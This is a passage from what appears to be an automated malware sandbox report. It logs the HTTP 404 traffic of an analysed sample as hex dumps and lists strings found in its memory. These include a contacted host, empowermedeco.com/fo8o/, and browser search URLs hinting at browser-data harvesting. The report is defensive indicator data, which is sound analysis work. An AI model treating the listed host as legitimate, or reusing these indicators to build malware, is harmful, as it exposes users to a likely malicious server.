64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 08 Jan 2025 13:59:51 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 08 Jan 2025 13:59:54 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 08 Jan 2025 13:59:57 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 08 Jan 2025 13:59:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:49 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:51 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:54 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:01:56 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:02 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:05 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:07 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4509692516.00000000052A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4509692516.00000000052A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
